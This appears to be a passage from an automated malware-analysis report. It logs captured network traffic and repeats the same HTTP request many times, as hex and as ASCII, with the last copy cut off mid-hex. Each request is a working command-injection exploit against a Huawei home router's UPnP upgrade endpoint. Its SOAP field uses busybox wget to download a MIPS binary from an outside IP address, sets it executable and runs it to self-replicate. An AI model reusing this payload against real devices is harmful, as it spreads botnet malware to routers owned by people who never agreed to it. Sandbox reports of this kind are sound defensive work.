55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 